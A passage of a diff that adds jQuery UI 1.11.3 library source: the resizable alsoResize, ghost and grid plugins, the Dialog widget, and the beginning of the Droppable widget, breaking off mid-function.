+$.ui.plugin.add("resizable", "alsoResize", {
+
+	start: function() {
+		var that = $(this).resizable( "instance" ),
+			o = that.options,
+			_store = function(exp) {
+				$(exp).each(function() {
+					var el = $(this);
+					el.data("ui-resizable-alsoresize", {
+						width: parseInt(el.width(), 10), height: parseInt(el.height(), 10),
+						left: parseInt(el.css("left"), 10), top: parseInt(el.css("top"), 10)
+					});
+				});
+			};
+
+		if (typeof(o.alsoResize) === "object" && !o.alsoResize.parentNode) {
+			if (o.alsoResize.length) {
+				o.alsoResize = o.alsoResize[0];
+				_store(o.alsoResize);
+			} else {
+				$.each(o.alsoResize, function(exp) {
+					_store(exp);
+				});
+			}
+		} else {
+			_store(o.alsoResize);
+		}
+	},
+
+	resize: function(event, ui) {
+		var that = $(this).resizable( "instance" ),
+			o = that.options,
+			os = that.originalSize,
+			op = that.originalPosition,
+			delta = {
+				height: (that.size.height - os.height) || 0,
+				width: (that.size.width - os.width) || 0,
+				top: (that.position.top - op.top) || 0,
+				left: (that.position.left - op.left) || 0
+			},
+
+			_alsoResize = function(exp, c) {
+				$(exp).each(function() {
+					var el = $(this), start = $(this).data("ui-resizable-alsoresize"), style = {},
+						css = c && c.length ?
+							c :
+							el.parents(ui.originalElement[0]).length ?
+								[ "width", "height" ] :
+								[ "width", "height", "top", "left" ];
+
+					$.each(css, function(i, prop) {
+						var sum = (start[prop] || 0) + (delta[prop] || 0);
+						if (sum && sum >= 0) {
+							style[prop] = sum || null;
+						}
+					});
+
+					el.css(style);
+				});
+			};
+
+		if (typeof(o.alsoResize) === "object" && !o.alsoResize.nodeType) {
+			$.each(o.alsoResize, function(exp, c) {
+				_alsoResize(exp, c);
+			});
+		} else {
+			_alsoResize(o.alsoResize);
+		}
+	},
+
+	stop: function() {
+		$(this).removeData("resizable-alsoresize");
+	}
+});
+
+$.ui.plugin.add("resizable", "ghost", {
+
+	start: function() {
+
+		var that = $(this).resizable( "instance" ), o = that.options, cs = that.size;
+
+		that.ghost = that.originalElement.clone();
+		that.ghost
+			.css({
+				opacity: 0.25,
+				display: "block",
+				position: "relative",
+				height: cs.height,
+				width: cs.width,
+				margin: 0,
+				left: 0,
+				top: 0
+			})
+			.addClass("ui-resizable-ghost")
+			.addClass(typeof o.ghost === "string" ? o.ghost : "");
+
+		that.ghost.appendTo(that.helper);
+
+	},
+
+	resize: function() {
+		var that = $(this).resizable( "instance" );
+		if (that.ghost) {
+			that.ghost.css({
+				position: "relative",
+				height: that.size.height,
+				width: that.size.width
+			});
+		}
+	},
+
+	stop: function() {
+		var that = $(this).resizable( "instance" );
+		if (that.ghost && that.helper) {
+			that.helper.get(0).removeChild(that.ghost.get(0));
+		}
+	}
+
+});
+
+$.ui.plugin.add("resizable", "grid", {
+
+	resize: function() {
+		var outerDimensions,
+			that = $(this).resizable( "instance" ),
+			o = that.options,
+			cs = that.size,
+			os = that.originalSize,
+			op = that.originalPosition,
+			a = that.axis,
+			grid = typeof o.grid === "number" ? [ o.grid, o.grid ] : o.grid,
+			gridX = (grid[0] || 1),
+			gridY = (grid[1] || 1),
+			ox = Math.round((cs.width - os.width) / gridX) * gridX,
+			oy = Math.round((cs.height - os.height) / gridY) * gridY,
+			newWidth = os.width + ox,
+			newHeight = os.height + oy,
+			isMaxWidth = o.maxWidth && (o.maxWidth < newWidth),
+			isMaxHeight = o.maxHeight && (o.maxHeight < newHeight),
+			isMinWidth = o.minWidth && (o.minWidth > newWidth),
+			isMinHeight = o.minHeight && (o.minHeight > newHeight);
+
+		o.grid = grid;
+
+		if (isMinWidth) {
+			newWidth += gridX;
+		}
+		if (isMinHeight) {
+			newHeight += gridY;
+		}
+		if (isMaxWidth) {
+			newWidth -= gridX;
+		}
+		if (isMaxHeight) {
+			newHeight -= gridY;
+		}
+
+		if (/^(se|s|e)$/.test(a)) {
+			that.size.width = newWidth;
+			that.size.height = newHeight;
+		} else if (/^(ne)$/.test(a)) {
+			that.size.width = newWidth;
+			that.size.height = newHeight;
+			that.position.top = op.top - oy;
+		} else if (/^(sw)$/.test(a)) {
+			that.size.width = newWidth;
+			that.size.height = newHeight;
+			that.position.left = op.left - ox;
+		} else {
+			if ( newHeight - gridY <= 0 || newWidth - gridX <= 0) {
+				outerDimensions = that._getPaddingPlusBorderDimensions( this );
+			}
+
+			if ( newHeight - gridY > 0 ) {
+				that.size.height = newHeight;
+				that.position.top = op.top - oy;
+			} else {
+				newHeight = gridY - outerDimensions.height;
+				that.size.height = newHeight;
+				that.position.top = op.top + os.height - newHeight;
+			}
+			if ( newWidth - gridX > 0 ) {
+				that.size.width = newWidth;
+				that.position.left = op.left - ox;
+			} else {
+				newWidth = gridX - outerDimensions.width;
+				that.size.width = newWidth;
+				that.position.left = op.left + os.width - newWidth;
+			}
+		}
+	}
+
+});
+
+var resizable = $.ui.resizable;
+
+
+/*!
+ * jQuery UI Dialog 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/dialog/
+ */
+
+
+var dialog = $.widget( "ui.dialog", {
+	version: "1.11.3",
+	options: {
+		appendTo: "body",
+		autoOpen: true,
+		buttons: [],
+		closeOnEscape: true,
+		closeText: "Close",
+		dialogClass: "",
+		draggable: true,
+		hide: null,
+		height: "auto",
+		maxHeight: null,
+		maxWidth: null,
+		minHeight: 150,
+		minWidth: 150,
+		modal: false,
+		position: {
+			my: "center",
+			at: "center",
+			of: window,
+			collision: "fit",
+			// Ensure the titlebar is always visible
+			using: function( pos ) {
+				var topOffset = $( this ).css( pos ).offset().top;
+				if ( topOffset < 0 ) {
+					$( this ).css( "top", pos.top - topOffset );
+				}
+			}
+		},
+		resizable: true,
+		show: null,
+		title: null,
+		width: 300,
+
+		// callbacks
+		beforeClose: null,
+		close: null,
+		drag: null,
+		dragStart: null,
+		dragStop: null,
+		focus: null,
+		open: null,
+		resize: null,
+		resizeStart: null,
+		resizeStop: null
+	},
+
+	sizeRelatedOptions: {
+		buttons: true,
+		height: true,
+		maxHeight: true,
+		maxWidth: true,
+		minHeight: true,
+		minWidth: true,
+		width: true
+	},
+
+	resizableRelatedOptions: {
+		maxHeight: true,
+		maxWidth: true,
+		minHeight: true,
+		minWidth: true
+	},
+
+	_create: function() {
+		this.originalCss = {
+			display: this.element[ 0 ].style.display,
+			width: this.element[ 0 ].style.width,
+			minHeight: this.element[ 0 ].style.minHeight,
+			maxHeight: this.element[ 0 ].style.maxHeight,
+			height: this.element[ 0 ].style.height
+		};
+		this.originalPosition = {
+			parent: this.element.parent(),
+			index: this.element.parent().children().index( this.element )
+		};
+		this.originalTitle = this.element.attr( "title" );
+		this.options.title = this.options.title || this.originalTitle;
+
+		this._createWrapper();
+
+		this.element
+			.show()
+			.removeAttr( "title" )
+			.addClass( "ui-dialog-content ui-widget-content" )
+			.appendTo( this.uiDialog );
+
+		this._createTitlebar();
+		this._createButtonPane();
+
+		if ( this.options.draggable && $.fn.draggable ) {
+			this._makeDraggable();
+		}
+		if ( this.options.resizable && $.fn.resizable ) {
+			this._makeResizable();
+		}
+
+		this._isOpen = false;
+
+		this._trackFocus();
+	},
+
+	_init: function() {
+		if ( this.options.autoOpen ) {
+			this.open();
+		}
+	},
+
+	_appendTo: function() {
+		var element = this.options.appendTo;
+		if ( element && (element.jquery || element.nodeType) ) {
+			return $( element );
+		}
+		return this.document.find( element || "body" ).eq( 0 );
+	},
+
+	_destroy: function() {
+		var next,
+			originalPosition = this.originalPosition;
+
+		this._destroyOverlay();
+
+		this.element
+			.removeUniqueId()
+			.removeClass( "ui-dialog-content ui-widget-content" )
+			.css( this.originalCss )
+			// Without detaching first, the following becomes really slow
+			.detach();
+
+		this.uiDialog.stop( true, true ).remove();
+
+		if ( this.originalTitle ) {
+			this.element.attr( "title", this.originalTitle );
+		}
+
+		next = originalPosition.parent.children().eq( originalPosition.index );
+		// Don't try to place the dialog next to itself (#8613)
+		if ( next.length && next[ 0 ] !== this.element[ 0 ] ) {
+			next.before( this.element );
+		} else {
+			originalPosition.parent.append( this.element );
+		}
+	},
+
+	widget: function() {
+		return this.uiDialog;
+	},
+
+	disable: $.noop,
+	enable: $.noop,
+
+	close: function( event ) {
+		var activeElement,
+			that = this;
+
+		if ( !this._isOpen || this._trigger( "beforeClose", event ) === false ) {
+			return;
+		}
+
+		this._isOpen = false;
+		this._focusedElement = null;
+		this._destroyOverlay();
+		this._untrackInstance();
+
+		if ( !this.opener.filter( ":focusable" ).focus().length ) {
+
+			// support: IE9
+			// IE9 throws an "Unspecified error" accessing document.activeElement from an <iframe>
+			try {
+				activeElement = this.document[ 0 ].activeElement;
+
+				// Support: IE9, IE10
+				// If the <body> is blurred, IE will switch windows, see #4520
+				if ( activeElement && activeElement.nodeName.toLowerCase() !== "body" ) {
+
+					// Hiding a focused element doesn't trigger blur in WebKit
+					// so in case we have nothing to focus on, explicitly blur the active element
+					// https://bugs.webkit.org/show_bug.cgi?id=47182
+					$( activeElement ).blur();
+				}
+			} catch ( error ) {}
+		}
+
+		this._hide( this.uiDialog, this.options.hide, function() {
+			that._trigger( "close", event );
+		});
+	},
+
+	isOpen: function() {
+		return this._isOpen;
+	},
+
+	moveToTop: function() {
+		this._moveToTop();
+	},
+
+	_moveToTop: function( event, silent ) {
+		var moved = false,
+			zIndicies = this.uiDialog.siblings( ".ui-front:visible" ).map(function() {
+				return +$( this ).css( "z-index" );
+			}).get(),
+			zIndexMax = Math.max.apply( null, zIndicies );
+
+		if ( zIndexMax >= +this.uiDialog.css( "z-index" ) ) {
+			this.uiDialog.css( "z-index", zIndexMax + 1 );
+			moved = true;
+		}
+
+		if ( moved && !silent ) {
+			this._trigger( "focus", event );
+		}
+		return moved;
+	},
+
+	open: function() {
+		var that = this;
+		if ( this._isOpen ) {
+			if ( this._moveToTop() ) {
+				this._focusTabbable();
+			}
+			return;
+		}
+
+		this._isOpen = true;
+		this.opener = $( this.document[ 0 ].activeElement );
+
+		this._size();
+		this._position();
+		this._createOverlay();
+		this._moveToTop( null, true );
+
+		// Ensure the overlay is moved to the top with the dialog, but only when
+		// opening. The overlay shouldn't move after the dialog is open so that
+		// modeless dialogs opened after the modal dialog stack properly.
+		if ( this.overlay ) {
+			this.overlay.css( "z-index", this.uiDialog.css( "z-index" ) - 1 );
+		}
+
+		this._show( this.uiDialog, this.options.show, function() {
+			that._focusTabbable();
+			that._trigger( "focus" );
+		});
+
+		// Track the dialog immediately upon openening in case a focus event
+		// somehow occurs outside of the dialog before an element inside the
+		// dialog is focused (#10152)
+		this._makeFocusTarget();
+
+		this._trigger( "open" );
+	},
+
+	_focusTabbable: function() {
+		// Set focus to the first match:
+		// 1. An element that was focused previously
+		// 2. First element inside the dialog matching [autofocus]
+		// 3. Tabbable element inside the content element
+		// 4. Tabbable element inside the buttonpane
+		// 5. The close button
+		// 6. The dialog itself
+		var hasFocus = this._focusedElement;
+		if ( !hasFocus ) {
+			hasFocus = this.element.find( "[autofocus]" );
+		}
+		if ( !hasFocus.length ) {
+			hasFocus = this.element.find( ":tabbable" );
+		}
+		if ( !hasFocus.length ) {
+			hasFocus = this.uiDialogButtonPane.find( ":tabbable" );
+		}
+		if ( !hasFocus.length ) {
+			hasFocus = this.uiDialogTitlebarClose.filter( ":tabbable" );
+		}
+		if ( !hasFocus.length ) {
+			hasFocus = this.uiDialog;
+		}
+		hasFocus.eq( 0 ).focus();
+	},
+
+	_keepFocus: function( event ) {
+		function checkFocus() {
+			var activeElement = this.document[0].activeElement,
+				isActive = this.uiDialog[0] === activeElement ||
+					$.contains( this.uiDialog[0], activeElement );
+			if ( !isActive ) {
+				this._focusTabbable();
+			}
+		}
+		event.preventDefault();
+		checkFocus.call( this );
+		// support: IE
+		// IE <= 8 doesn't prevent moving focus even with event.preventDefault()
+		// so we check again later
+		this._delay( checkFocus );
+	},
+
+	_createWrapper: function() {
+		this.uiDialog = $("<div>")
+			.addClass( "ui-dialog ui-widget ui-widget-content ui-corner-all ui-front " +
+				this.options.dialogClass )
+			.hide()
+			.attr({
+				// Setting tabIndex makes the div focusable
+				tabIndex: -1,
+				role: "dialog"
+			})
+			.appendTo( this._appendTo() );
+
+		this._on( this.uiDialog, {
+			keydown: function( event ) {
+				if ( this.options.closeOnEscape && !event.isDefaultPrevented() && event.keyCode &&
+						event.keyCode === $.ui.keyCode.ESCAPE ) {
+					event.preventDefault();
+					this.close( event );
+					return;
+				}
+
+				// prevent tabbing out of dialogs
+				if ( event.keyCode !== $.ui.keyCode.TAB || event.isDefaultPrevented() ) {
+					return;
+				}
+				var tabbables = this.uiDialog.find( ":tabbable" ),
+					first = tabbables.filter( ":first" ),
+					last = tabbables.filter( ":last" );
+
+				if ( ( event.target === last[0] || event.target === this.uiDialog[0] ) && !event.shiftKey ) {
+					this._delay(function() {
+						first.focus();
+					});
+					event.preventDefault();
+				} else if ( ( event.target === first[0] || event.target === this.uiDialog[0] ) && event.shiftKey ) {
+					this._delay(function() {
+						last.focus();
+					});
+					event.preventDefault();
+				}
+			},
+			mousedown: function( event ) {
+				if ( this._moveToTop( event ) ) {
+					this._focusTabbable();
+				}
+			}
+		});
+
+		// We assume that any existing aria-describedby attribute means
+		// that the dialog content is marked up properly
+		// otherwise we brute force the content as the description
+		if ( !this.element.find( "[aria-describedby]" ).length ) {
+			this.uiDialog.attr({
+				"aria-describedby": this.element.uniqueId().attr( "id" )
+			});
+		}
+	},
+
+	_createTitlebar: function() {
+		var uiDialogTitle;
+
+		this.uiDialogTitlebar = $( "<div>" )
+			.addClass( "ui-dialog-titlebar ui-widget-header ui-corner-all ui-helper-clearfix" )
+			.prependTo( this.uiDialog );
+		this._on( this.uiDialogTitlebar, {
+			mousedown: function( event ) {
+				// Don't prevent click on close button (#8838)
+				// Focusing a dialog that is partially scrolled out of view
+				// causes the browser to scroll it into view, preventing the click event
+				if ( !$( event.target ).closest( ".ui-dialog-titlebar-close" ) ) {
+					// Dialog isn't getting focus when dragging (#8063)
+					this.uiDialog.focus();
+				}
+			}
+		});
+
+		// support: IE
+		// Use type="button" to prevent enter keypresses in textboxes from closing the
+		// dialog in IE (#9312)
+		this.uiDialogTitlebarClose = $( "<button type='button'></button>" )
+			.button({
+				label: this.options.closeText,
+				icons: {
+					primary: "ui-icon-closethick"
+				},
+				text: false
+			})
+			.addClass( "ui-dialog-titlebar-close" )
+			.appendTo( this.uiDialogTitlebar );
+		this._on( this.uiDialogTitlebarClose, {
+			click: function( event ) {
+				event.preventDefault();
+				this.close( event );
+			}
+		});
+
+		uiDialogTitle = $( "<span>" )
+			.uniqueId()
+			.addClass( "ui-dialog-title" )
+			.prependTo( this.uiDialogTitlebar );
+		this._title( uiDialogTitle );
+
+		this.uiDialog.attr({
+			"aria-labelledby": uiDialogTitle.attr( "id" )
+		});
+	},
+
+	_title: function( title ) {
+		if ( !this.options.title ) {
+			title.html( "&#160;" );
+		}
+		title.text( this.options.title );
+	},
+
+	_createButtonPane: function() {
+		this.uiDialogButtonPane = $( "<div>" )
+			.addClass( "ui-dialog-buttonpane ui-widget-content ui-helper-clearfix" );
+
+		this.uiButtonSet = $( "<div>" )
+			.addClass( "ui-dialog-buttonset" )
+			.appendTo( this.uiDialogButtonPane );
+
+		this._createButtons();
+	},
+
+	_createButtons: function() {
+		var that = this,
+			buttons = this.options.buttons;
+
+		// if we already have a button pane, remove it
+		this.uiDialogButtonPane.remove();
+		this.uiButtonSet.empty();
+
+		if ( $.isEmptyObject( buttons ) || ($.isArray( buttons ) && !buttons.length) ) {
+			this.uiDialog.removeClass( "ui-dialog-buttons" );
+			return;
+		}
+
+		$.each( buttons, function( name, props ) {
+			var click, buttonOptions;
+			props = $.isFunction( props ) ?
+				{ click: props, text: name } :
+				props;
+			// Default to a non-submitting button
+			props = $.extend( { type: "button" }, props );
+			// Change the context for the click callback to be the main element
+			click = props.click;
+			props.click = function() {
+				click.apply( that.element[ 0 ], arguments );
+			};
+			buttonOptions = {
+				icons: props.icons,
+				text: props.showText
+			};
+			delete props.icons;
+			delete props.showText;
+			$( "<button></button>", props )
+				.button( buttonOptions )
+				.appendTo( that.uiButtonSet );
+		});
+		this.uiDialog.addClass( "ui-dialog-buttons" );
+		this.uiDialogButtonPane.appendTo( this.uiDialog );
+	},
+
+	_makeDraggable: function() {
+		var that = this,
+			options = this.options;
+
+		function filteredUi( ui ) {
+			return {
+				position: ui.position,
+				offset: ui.offset
+			};
+		}
+
+		this.uiDialog.draggable({
+			cancel: ".ui-dialog-content, .ui-dialog-titlebar-close",
+			handle: ".ui-dialog-titlebar",
+			containment: "document",
+			start: function( event, ui ) {
+				$( this ).addClass( "ui-dialog-dragging" );
+				that._blockFrames();
+				that._trigger( "dragStart", event, filteredUi( ui ) );
+			},
+			drag: function( event, ui ) {
+				that._trigger( "drag", event, filteredUi( ui ) );
+			},
+			stop: function( event, ui ) {
+				var left = ui.offset.left - that.document.scrollLeft(),
+					top = ui.offset.top - that.document.scrollTop();
+
+				options.position = {
+					my: "left top",
+					at: "left" + (left >= 0 ? "+" : "") + left + " " +
+						"top" + (top >= 0 ? "+" : "") + top,
+					of: that.window
+				};
+				$( this ).removeClass( "ui-dialog-dragging" );
+				that._unblockFrames();
+				that._trigger( "dragStop", event, filteredUi( ui ) );
+			}
+		});
+	},
+
+	_makeResizable: function() {
+		var that = this,
+			options = this.options,
+			handles = options.resizable,
+			// .ui-resizable has position: relative defined in the stylesheet
+			// but dialogs have to use absolute or fixed positioning
+			position = this.uiDialog.css("position"),
+			resizeHandles = typeof handles === "string" ?
+				handles	:
+				"n,e,s,w,se,sw,ne,nw";
+
+		function filteredUi( ui ) {
+			return {
+				originalPosition: ui.originalPosition,
+				originalSize: ui.originalSize,
+				position: ui.position,
+				size: ui.size
+			};
+		}
+
+		this.uiDialog.resizable({
+			cancel: ".ui-dialog-content",
+			containment: "document",
+			alsoResize: this.element,
+			maxWidth: options.maxWidth,
+			maxHeight: options.maxHeight,
+			minWidth: options.minWidth,
+			minHeight: this._minHeight(),
+			handles: resizeHandles,
+			start: function( event, ui ) {
+				$( this ).addClass( "ui-dialog-resizing" );
+				that._blockFrames();
+				that._trigger( "resizeStart", event, filteredUi( ui ) );
+			},
+			resize: function( event, ui ) {
+				that._trigger( "resize", event, filteredUi( ui ) );
+			},
+			stop: function( event, ui ) {
+				var offset = that.uiDialog.offset(),
+					left = offset.left - that.document.scrollLeft(),
+					top = offset.top - that.document.scrollTop();
+
+				options.height = that.uiDialog.height();
+				options.width = that.uiDialog.width();
+				options.position = {
+					my: "left top",
+					at: "left" + (left >= 0 ? "+" : "") + left + " " +
+						"top" + (top >= 0 ? "+" : "") + top,
+					of: that.window
+				};
+				$( this ).removeClass( "ui-dialog-resizing" );
+				that._unblockFrames();
+				that._trigger( "resizeStop", event, filteredUi( ui ) );
+			}
+		})
+		.css( "position", position );
+	},
+
+	_trackFocus: function() {
+		this._on( this.widget(), {
+			focusin: function( event ) {
+				this._makeFocusTarget();
+				this._focusedElement = $( event.target );
+			}
+		});
+	},
+
+	_makeFocusTarget: function() {
+		this._untrackInstance();
+		this._trackingInstances().unshift( this );
+	},
+
+	_untrackInstance: function() {
+		var instances = this._trackingInstances(),
+			exists = $.inArray( this, instances );
+		if ( exists !== -1 ) {
+			instances.splice( exists, 1 );
+		}
+	},
+
+	_trackingInstances: function() {
+		var instances = this.document.data( "ui-dialog-instances" );
+		if ( !instances ) {
+			instances = [];
+			this.document.data( "ui-dialog-instances", instances );
+		}
+		return instances;
+	},
+
+	_minHeight: function() {
+		var options = this.options;
+
+		return options.height === "auto" ?
+			options.minHeight :
+			Math.min( options.minHeight, options.height );
+	},
+
+	_position: function() {
+		// Need to show the dialog to get the actual offset in the position plugin
+		var isVisible = this.uiDialog.is( ":visible" );
+		if ( !isVisible ) {
+			this.uiDialog.show();
+		}
+		this.uiDialog.position( this.options.position );
+		if ( !isVisible ) {
+			this.uiDialog.hide();
+		}
+	},
+
+	_setOptions: function( options ) {
+		var that = this,
+			resize = false,
+			resizableOptions = {};
+
+		$.each( options, function( key, value ) {
+			that._setOption( key, value );
+
+			if ( key in that.sizeRelatedOptions ) {
+				resize = true;
+			}
+			if ( key in that.resizableRelatedOptions ) {
+				resizableOptions[ key ] = value;
+			}
+		});
+
+		if ( resize ) {
+			this._size();
+			this._position();
+		}
+		if ( this.uiDialog.is( ":data(ui-resizable)" ) ) {
+			this.uiDialog.resizable( "option", resizableOptions );
+		}
+	},
+
+	_setOption: function( key, value ) {
+		var isDraggable, isResizable,
+			uiDialog = this.uiDialog;
+
+		if ( key === "dialogClass" ) {
+			uiDialog
+				.removeClass( this.options.dialogClass )
+				.addClass( value );
+		}
+
+		if ( key === "disabled" ) {
+			return;
+		}
+
+		this._super( key, value );
+
+		if ( key === "appendTo" ) {
+			this.uiDialog.appendTo( this._appendTo() );
+		}
+
+		if ( key === "buttons" ) {
+			this._createButtons();
+		}
+
+		if ( key === "closeText" ) {
+			this.uiDialogTitlebarClose.button({
+				// Ensure that we always pass a string
+				label: "" + value
+			});
+		}
+
+		if ( key === "draggable" ) {
+			isDraggable = uiDialog.is( ":data(ui-draggable)" );
+			if ( isDraggable && !value ) {
+				uiDialog.draggable( "destroy" );
+			}
+
+			if ( !isDraggable && value ) {
+				this._makeDraggable();
+			}
+		}
+
+		if ( key === "position" ) {
+			this._position();
+		}
+
+		if ( key === "resizable" ) {
+			// currently resizable, becoming non-resizable
+			isResizable = uiDialog.is( ":data(ui-resizable)" );
+			if ( isResizable && !value ) {
+				uiDialog.resizable( "destroy" );
+			}
+
+			// currently resizable, changing handles
+			if ( isResizable && typeof value === "string" ) {
+				uiDialog.resizable( "option", "handles", value );
+			}
+
+			// currently non-resizable, becoming resizable
+			if ( !isResizable && value !== false ) {
+				this._makeResizable();
+			}
+		}
+
+		if ( key === "title" ) {
+			this._title( this.uiDialogTitlebar.find( ".ui-dialog-title" ) );
+		}
+	},
+
+	_size: function() {
+		// If the user has resized the dialog, the .ui-dialog and .ui-dialog-content
+		// divs will both have width and height set, so we need to reset them
+		var nonContentHeight, minContentHeight, maxContentHeight,
+			options = this.options;
+
+		// Reset content sizing
+		this.element.show().css({
+			width: "auto",
+			minHeight: 0,
+			maxHeight: "none",
+			height: 0
+		});
+
+		if ( options.minWidth > options.width ) {
+			options.width = options.minWidth;
+		}
+
+		// reset wrapper sizing
+		// determine the height of all the non-content elements
+		nonContentHeight = this.uiDialog.css({
+				height: "auto",
+				width: options.width
+			})
+			.outerHeight();
+		minContentHeight = Math.max( 0, options.minHeight - nonContentHeight );
+		maxContentHeight = typeof options.maxHeight === "number" ?
+			Math.max( 0, options.maxHeight - nonContentHeight ) :
+			"none";
+
+		if ( options.height === "auto" ) {
+			this.element.css({
+				minHeight: minContentHeight,
+				maxHeight: maxContentHeight,
+				height: "auto"
+			});
+		} else {
+			this.element.height( Math.max( 0, options.height - nonContentHeight ) );
+		}
+
+		if ( this.uiDialog.is( ":data(ui-resizable)" ) ) {
+			this.uiDialog.resizable( "option", "minHeight", this._minHeight() );
+		}
+	},
+
+	_blockFrames: function() {
+		this.iframeBlocks = this.document.find( "iframe" ).map(function() {
+			var iframe = $( this );
+
+			return $( "<div>" )
+				.css({
+					position: "absolute",
+					width: iframe.outerWidth(),
+					height: iframe.outerHeight()
+				})
+				.appendTo( iframe.parent() )
+				.offset( iframe.offset() )[0];
+		});
+	},
+
+	_unblockFrames: function() {
+		if ( this.iframeBlocks ) {
+			this.iframeBlocks.remove();
+			delete this.iframeBlocks;
+		}
+	},
+
+	_allowInteraction: function( event ) {
+		if ( $( event.target ).closest( ".ui-dialog" ).length ) {
+			return true;
+		}
+
+		// TODO: Remove hack when datepicker implements
+		// the .ui-front logic (#8989)
+		return !!$( event.target ).closest( ".ui-datepicker" ).length;
+	},
+
+	_createOverlay: function() {
+		if ( !this.options.modal ) {
+			return;
+		}
+
+		// We use a delay in case the overlay is created from an
+		// event that we're going to be cancelling (#2804)
+		var isOpening = true;
+		this._delay(function() {
+			isOpening = false;
+		});
+
+		if ( !this.document.data( "ui-dialog-overlays" ) ) {
+
+			// Prevent use of anchors and inputs
+			// Using _on() for an event handler shared across many instances is
+			// safe because the dialogs stack and must be closed in reverse order
+			this._on( this.document, {
+				focusin: function( event ) {
+					if ( isOpening ) {
+						return;
+					}
+
+					if ( !this._allowInteraction( event ) ) {
+						event.preventDefault();
+						this._trackingInstances()[ 0 ]._focusTabbable();
+					}
+				}
+			});
+		}
+
+		this.overlay = $( "<div>" )
+			.addClass( "ui-widget-overlay ui-front" )
+			.appendTo( this._appendTo() );
+		this._on( this.overlay, {
+			mousedown: "_keepFocus"
+		});
+		this.document.data( "ui-dialog-overlays",
+			(this.document.data( "ui-dialog-overlays" ) || 0) + 1 );
+	},
+
+	_destroyOverlay: function() {
+		if ( !this.options.modal ) {
+			return;
+		}
+
+		if ( this.overlay ) {
+			var overlays = this.document.data( "ui-dialog-overlays" ) - 1;
+
+			if ( !overlays ) {
+				this.document
+					.unbind( "focusin" )
+					.removeData( "ui-dialog-overlays" );
+			} else {
+				this.document.data( "ui-dialog-overlays", overlays );
+			}
+
+			this.overlay.remove();
+			this.overlay = null;
+		}
+	}
+});
+
+
+/*!
+ * jQuery UI Droppable 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/droppable/
+ */
+
+
+$.widget( "ui.droppable", {
+	version: "1.11.3",
+	widgetEventPrefix: "drop",
+	options: {
+		accept: "*",
+		activeClass: false,
+		addClasses: true,
+		greedy: false,
+		hoverClass: false,
+		scope: "default",
+		tolerance: "intersect",
+
+		// callbacks
+		activate: null,
+		deactivate: null,
+		drop: null,
+		out: null,
+		over: null
+	},
+	_create: function() {
+
+		var proportions,
+			o = this.options,
+			accept = o.accept;
+
+		this.isover = false;
+		this.isout = true;
+
+		this.accept = $.isFunction( accept ) ? accept : function( d ) {
+			return d.is( accept );
+		};
+
+		this.proportions = function( /* valueToWrite */ ) {
+			if ( arguments.length ) {
+				// Store the droppable's proportions
+				proportions = arguments[ 0 ];
+			} else {
+				// Retrieve or derive the droppable's proportions
+				return proportions ?
+					proportions :
+					proportions = {
+						width: this.element[ 0 ].offsetWidth,
+						height: this.element[ 0 ].offsetHeight
+					};
+			}
+		};
+
+		this._addToManager( o.scope );
+
+		o.addClasses && this.element.addClass( "ui-droppable" );
+
+	},
+
+	_addToManager: function( scope ) {
+		// Add the reference and positions to the manager
+		$.ui.ddmanager.droppables[ scope ] = $.ui.ddmanager.droppables[ scope ] || [];
+		$.ui.ddmanager.droppables[ scope ].push( this );
+	},
+
+	_splice: function( drop ) {
+		var i = 0;
+		for ( ; i < drop.length; i++ ) {
+			if ( drop[ i ] === this ) {
+				drop.splice( i, 1 );
+			}
+		}
+	},
+
+	_destroy: function() {
+		var drop = $.ui.ddmanager.droppables[ this.options.scope ];
+
+		this._splice( drop );
+
+		this.element.removeClass( "ui-droppable ui-droppable-disabled" );
+	},
+
+	_setOption: function( key, value ) {
+
+		if ( key === "accept" ) {
+			this.accept = $.isFunction( value ) ? value : function( d ) {
+				return d.is( value );
+			};
+		} else if ( key === "scope" ) {
+			var drop = $.ui.ddmanager.droppables[ this.options.scope ];
+
+			this._splice( drop );
+			this._addToManager( value );
+		}
+
+		this._super( key, value );
+	},
+
+	_activate: function( event ) {
+		var draggable = $.ui.ddmanager.current;
+		if ( this.options.activeClass ) {
+			this.element.addClass( this.options.activeClass );
+		}
+		if ( draggable ){
+			this._trigger( "activate", event, this.ui( draggable ) );
+		}
+	},
+
+	_deactivate: function( event ) {
+		var draggable = $.ui.ddmanager.current;
+		if ( this.options.activeClass ) {
+			this.element.removeClass( this.options.activeClass );
+		}
+		if ( draggable ){
+			this._trigger( "deactivate", event, this.ui( draggable ) );
+		}
+	},
+
+	_over: function( event ) {
+
+		var draggable = $.ui.ddmanager.current;
+
+		// Bail if draggable and droppable are same element
+		if ( !draggable || ( draggable.currentItem || draggable.element )[ 0 ] === this.element[ 0 ] ) {
+			return;
+		}
+
+		if ( this.accept.call( this.element[ 0 ], ( draggable.currentItem || draggable.element ) ) ) {
+			if ( this.options.hoverClass ) {
+				this.element.addClass( this.options.hoverClass );
+			}
+			this._trigger( "over", event, this.ui( draggable ) );
+		}
+
+	},
+
+	_out: function( event ) {
+
+		var draggable = $.ui.ddmanager.current;
+
+		// Bail if draggable and droppable are same element
+		if ( !draggable || ( draggable.currentItem || draggable.element )[ 0 ] === this.element[ 0 ] ) {
+			return;
+		}
+
+		if ( this.accept.call( this.element[ 0 ], ( draggable.currentItem || draggable.element ) ) ) {
+			if ( this.options.hoverClass ) {
+				this.element.removeClass( this.options.hoverClass );
+			}
+			this._trigger( "out", event, this.ui( draggable ) );
+		}
+
+	},
+
+	_drop: function( event, custom ) {
+
+		var draggable = custom || $.ui.ddmanager.current,
+			childrenIntersection = false;
+
+		// Bail if draggable and droppable are same element
+		if ( !draggable || ( draggable.currentItem || draggable.element )[ 0 ] === this.element[ 0 ] ) {
+			return false;
+		}
+
+		this.element.find( ":data(ui-droppable)" ).not( ".ui-draggable-dragging" ).each(function() {
+			var inst = $( this ).droppable( "instance" );
+			if (
+				inst.options.greedy &&
+				!inst.options.disabled &&
+				inst.options.scope === draggable.options.scope &&
+				inst.accept.call( inst.element[ 0 ], ( draggable.currentItem || draggable.element ) ) &&
+				$.ui.intersect( draggable, $.extend( inst, { offset: inst.element.offset() } ), inst.options.tolerance, event )
+			) { childrenIntersection = true; return false; }
+		});
+		if ( childrenIntersection ) {
+			return false;
+		}
+
